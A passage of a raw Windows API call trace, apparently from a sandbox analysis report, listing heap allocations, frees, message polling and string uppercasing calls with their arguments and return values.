0x2a719e8 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0207.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadf8 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0207.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0207.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0207.055] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0207.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0207.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa900 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0207.055] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0207.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0207.056] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0207.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0207.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0207.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0207.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0207.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0207.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0207.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0207.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0207.057] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0207.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaac30 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0207.057] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0207.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0207.058] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0207.058] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0207.058] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0207.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0207.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0207.059] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0207.059] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0207.059] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0207.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaca8 [0207.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0207.060] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0207.060] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0207.060] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0207.060] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0207.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad08 [0207.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab58 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.061] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0207.061] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0207.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0207.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0207.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0207.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0207.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0207.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0207.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0207.062] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0207.062] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0207.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaad08 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0207.062] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0207.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0207.063] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0207.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0207.063] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0207.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 